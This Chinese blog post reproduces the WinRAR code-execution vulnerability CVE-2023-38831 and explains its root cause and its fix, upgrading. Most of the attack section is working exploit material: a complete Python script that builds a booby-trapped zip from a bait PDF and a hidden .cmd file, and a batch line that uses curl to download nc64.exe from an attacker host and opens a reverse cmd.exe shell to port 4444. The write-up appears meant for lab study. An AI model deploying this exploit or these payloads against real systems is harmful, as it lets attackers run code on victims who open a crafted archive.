WinRAR代码执行漏洞复现

最新推荐文章于 2024-05-20 20:15:13 发布
最新推荐文章于 2024-05-20 20:15:13 发布
阅读量1k 收藏 23
点赞数 22
文章标签: winrar 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50892961/article/details/135340186
版权

一、漏洞介绍

WinRAR是一款文件压缩器,该产品支持RAR、ZIP等格式文件的压缩和解压等。WinRAR在处理压缩包内同名的文件与文件夹时代码执行漏洞,攻击者构建由恶意文件与非恶意文件构成的特制压缩包文件,诱导受害者打开此文件后,将在受害者机器上执行任意代码。

RARLabs WinRAR 6.23之前版本存在安全漏洞,攻击者利用该漏洞可以执行任意代码。

漏洞触发主要分成两个环节:

1、点击诱饵文件时同名文件夹下的文件被释放
2、执行文件时执行文件夹下的 .cmd文件而不是原文件

二、漏洞检测

1、准备文件需要执行的命令【打开计算器】

后面的命令为打开诱导文件【防止用户怀疑】

修改后缀名为.bat

2、准备恶意脚本cve-2023-38831-exp-gen.py【github下载后修改】
import shutil
import os, sys
from os.path import join
TEMPLATE_NAME = "TEMPLATE"
OUTPUT_NAME = "poc.zip"

BAIT_NAME = "hushuo_demo.pdf"
SCRIPT_NAME = "script.bat"

if len(sys.argv) > 3:
    BAIT_NAME = os.path.basename(sys.argv[1])
    SCRIPT_NAME = os.path.basename(sys.argv[2])
    OUTPUT_NAME = os.path.basename(sys.argv[3])
elif len(sys.argv) == 2 and sys.argv[1] == "poc":
    pass
else:
    print("""Usage:
          python .\make.py poc
          python .\make.py <BAIT_NAME> <SCRIPT_NAME> <OUTPUT_NAME>""")
    sys.exit()

BAIT_EXT = b"." + bytes(BAIT_NAME.split(".")[-1], "utf-8")

print("BAIT_NAME:", BAIT_NAME)
print("SCRIPT_NAME:", SCRIPT_NAME)
print("OUTPUT_NAME:", OUTPUT_NAME)

if os.path.exists(TEMPLATE_NAME):
    shutil.rmtree(TEMPLATE_NAME)
os.mkdir(TEMPLATE_NAME)
d = join(TEMPLATE_NAME, BAIT_NAME + "A")
if not os.path.exists(d):
    os.mkdir(d)

shutil.copyfile(join(SCRIPT_NAME), join(d, BAIT_NAME+"A.cmd"))
shutil.copyfile(join(BAIT_NAME), join(TEMPLATE_NAME, BAIT_NAME+"B"))

# if os.path.exists(OUTPUT_NAME):
#     print("!!! dir %s exists, delete it first" %(OUTPUT_NAME))
#     sys.exit()

shutil.make_archive(TEMPLATE_NAME, 'zip', TEMPLATE_NAME)

with open(TEMPLATE_NAME + ".zip", "rb") as f:
    content = f.read()
    content = content.replace(BAIT_EXT + b"A", BAIT_EXT + b" ")
    content = content.replace(BAIT_EXT + b"B", BAIT_EXT + b" ")

os.remove(TEMPLATE_NAME + ".zip")

with open(OUTPUT_NAME, "wb")  as f:
    f.write(content)

print("ok..")

3、准备诱导文件hushuo_demo.pdf

4、运行脚本生成恶意压缩包【.py+script.bat+hushuo_demo.pdf】

5、使用winrar打开压缩包,再双击诱导文件【打开计算器则成功】

三、漏洞利用

1、kali启动http服务【将nc64.exe在此目录下】

python -m http.server

2、kali启动端口监听【4444】

3、本地POC文件制作

(1)hushuo_demo.pdf 诱导文件

(2)script.bat 脚本内容:

curl http://192.168.31.30:8000/nc64.exe -O nc64.exe & nc64.exe 192.168.31.30 4444 -e cmd.exe -d & hushuo_demo.pdf

(3)make.py 脚本内容:

4、运行脚本

5、在winRAR(<=6.23)中打开POC文件

双击普通文件,漏洞触发(运行script..bat内容、下载nc64.exe、建立反弹连接)

查看监听端口【漏洞触发】

四、漏洞原理

1、当受害者尝试打开存档文件中的"hushuo_demo.pdf"时,WinRAR会比较存档中的所有文件以查找与"hushuo_demo.pdf"同名的文件/目录

2、如果存在与"hushuo_demo.pdf"同名的目录,WinRAR则会继续检查"hushuo_demo.pdf/"目录下的文件

【文件夹后面有空格,win识别时不读取空格,所以认定为同名文件】

3、如果"hushuo_demo.pdf/"目录下同样存在文件名为"hushuo_demo.pdf"的文件则将"hushuo_demo.pdf/"目录下"hushuo_demo.pdf"文件放入提取列表中

【恶意文件后缀为.pdf.cmd,win识别时只读取第一个. (截断) 所以认定为同名文件】

4、最终导致压缩包中的hushuo_demo.pdf .cmd被解压出来,并且运行

【需要使用恶意脚本make.py 是因为正常windows无法做到同名文件/文件夹同时存在,无法保存有空格的文件夹名字】

五、漏洞修复

升级WinRAR版本6.23及以上。

wish-xiaohe
关注
  • 22
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2021-08-27 网安实验-Windows系统渗透测试之WinRAR代码执行漏洞
时光隧道
08-27 4万+
漏洞影响的范围: WinRAR < 5.70 Beta 1 Bandizip < = 6.2.0.0 好压(2345压缩) < = 5.9.8.10907 360压缩 < = 4.0.0.1170 实验步骤一 1.首先从网上下载CVE-2017-8759漏洞exp到本地目录: https://github.com/WyAtu/CVE-2018-20250 2. exp文件如下: 3. 运行exp.py,生成测试文件“test.rar” 4. 运行acefi
cve-2018-20250 WinRAR代码执行漏洞演示
02-28
此视频是对与WinRAR 代码执行漏洞的演示视频,因为原漏洞发布厂商并没有发布对应的poc,和演示视频,特录制了视频方便大家观看效果,里面还附带了大家最想要的poc ,希望对大家有帮助
WinRAR远程代码执行漏洞复现(CVE-2018-20250)
小赵同学的博客
02-05 334
漏洞简介 该漏洞是由于WinRAR 所使用的一个陈旧的动态链接库UNACEV2.dll所造成的,该动态链接库在2006 年被编译,没有任何的基础保护机制(ASLR, DEP等)。该动态链接库的作用是处理ACE 格式文件。而在解压处理过程中存在一处目录穿越漏洞,允许解压过程写入文件至开机启动项,导致代码执行。 1. 准备环境 WinRAR < 5.70版本(我使用的5.60) 靶机:Windows 7 IP:192.168.228.130 攻击机:kali IP:192.168.228.128 Ex
WinRAR 代码执行漏洞复现
andiao1218的博客
03-01 158
影响版本: WinRAR < 5.70 Beta 1 Bandizip < = 6.2.0.0 好压(2345压缩) < = 5.9.8.10907 360压缩 < = 4.0.0.1170 测试版本:WinRAR 5.61 工具地址:https://github.com/droe/acefile 010 Editor、WinAce...
WinRAR代码执行漏洞CVE-2023-38831复现
键盘上温暖而又美好的时光
08-29 214
rar poc
WinRAR代码执行漏洞(CVE-2023-38831)
qq_42751192的博客
08-29 403
WinRAR 在处理压缩包内同名的文件与文件夹时存在代码执行漏洞。攻击者构建由恶意文件与非恶意文件构成的特制压缩包文件,诱导受害者打开此文件中看似无害的文件(如JPG文件)后,将在受害者机器上执行任意代码
WinRAR CVE-2023-40477代码执行漏洞复现
玩人工智能的辣条哥的博客
10-25 270
WinRAR6.117z 23.01受影响版本。
WinRAR 代码执行漏洞RCE (CVE-2023-38831)-资源包
09-11
WinRAR在处理压缩包内同名的文件与文件夹时代码执行漏洞,攻击者构建由恶意文件与非恶意文件构成的特制压缩包文件,诱导受害者打开此文件后,将在受害者机器上执行任意代码RARLabs WinRAR 6.23之前版本存在安全漏洞...
CVE-2023-40477 WinRAR 远程代码执行漏洞 PoC
09-02
WinRAR 拥有超过 500 亿用户,面临新漏洞(CVE-2023-40477、CVE-2023-38831)。 今天,我们首次展示:CVE-2023-40477 的 PoC。 尽管 RCE 被认为是可利用的,但由于多种原因,其在实现过程中看起来并不乐观。 我们在...
CVE-2023-38831 WinRAR 远程代码执行漏洞 0Day PoC
08-25
CVE-2023-38831 漏洞位于ZIP文件的处理过程,攻击者可以制作恶意.ZIP或.RAR压缩文件,其中包含无害文件(例如.jpg、.txt或PDF文件等)及恶意执行文件,并以无害文件名为文件夹命名。当用户点击并试图解压缩看似合法...
实现winrar密码破解的vbs代码
09-05
用vbs实现的用了破解winrar密码的代码,需要的朋友可以参考下。
winrar压缩命令实例
ying1979的专栏
08-10 502
winrar压缩命令实例
RSAC 2024观察:软件供应链安全进入AI+时代
lurenjia404的博客
05-15 919
盘点RSAC会议上软件供应链安全议题的特点、趋势及启示。
高效且安全的传输工具:FileLink跨网文件传输
m0_69398711的博客
05-14 463
同时,它还提供了权限控制功能,例如:文件打开次数、访问时间、禁止截屏、禁止复制、禁止打印、显示水印,有效防止了数据泄露和非法访问。然而,FileLink利用先进的网络技术和协议优化,成功打破了这一局限。它提供广泛的集成支持,权限组件、审批组件均开放API,可与企业现有IT系统充分集成,深度支撑与贯通企业跨网业务流程,致力于打造更全面的数据安全平台。综上所述,FileLink跨网文件传输以其出色的跨网络性能、安全性、多功能性、易用性以及集成扩展能力,成为了现代办公和日常生活中不可或缺的文件传输工具。
安全警钟】APP如何筑起坚不可摧的防御,抵御黑客攻击?
最新发布
NSME1的博客
05-20 140
做好安全防御
Web应用防火墙的重要性
XRY_XIAO的博客
05-20 346
Web应用防火墙的重要性
Llama 3 模型家族构建安全可信赖企业级AI应用之 Code Llama (一)
段智华的博客
05-17 857
1、Llama开源模型家族大模型技术、工具和多模态详解:学员将深入了解Meta Llama 3的创新之处,比如其在语言模型技术上的突破,并学习到如何在Llama 3中构建trust and safety AI。8、Llama 3中的DPO原理、算法、组件及具体实现及算法进阶:学习Llama 3中结合使用PPO和DPO算法,剖析DPO的原理和工作机制,详细解析DPO中的关键算法组件,并通过综合项目八从零开始动手实现和测试DPO算法,同时课程将解密DPO进阶技术Iterative DPO及IPO算法。
富格林:梳理可信经验保障安全
fgl100的博客
05-13 242
通过多渠道的收集和分析找到市场的波动趋势,在根据趋势的变化进行交易。如果投资者对趋势变化没有把握的话,可以多留意正规专业的交易平台讯息,一般情况下都会给大家分享市场最新的走势变化,阅读贵金属知识课堂的文章就能够知道很多基本面消息,也能学到各种技术分析方法。富格林悉知,现货黄金被视作一种稳健的投资工具,因其对抗通货膨胀和政治不确定性的能力而备受青睐。如果处于亏损状态的时候,应该保持冷静,理性分析市场波动情况,如果亏损情况严重,应该及时离场保住自己的最大利益,重新调整心态再进场。
java调用winrar的具体代码
03-11
以下是Java调用WinRAR的示例代码: ```java import java.io.File; import java.io.IOException; public class WinRAR { public static void main(String[] args) throws IOException { String rarPath = "C:\\Program Files\\WinRAR\\WinRAR.exe"; // WinRAR的安装路径 String sourcePath = "C:\\Users\\user\\Desktop\\test"; // 需要压缩的文件夹路径 String targetPath = "C:\\Users\\user\\Desktop\\test.rar"; // 压缩后的文件路径 // 构造WinRAR命令 String cmd = rarPath + " a -r " + targetPath + " " + sourcePath; // 执行WinRAR命令 Process process = Runtime.getRuntime().exec(cmd); // 等待WinRAR执行完成 try { process.waitFor(); } catch (InterruptedException e) { e.printStackTrace(); } // 输出WinRAR执行结果 System.out.println(process.exitValue() == 0 ? "压缩成功" : "压缩失败"); } } ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值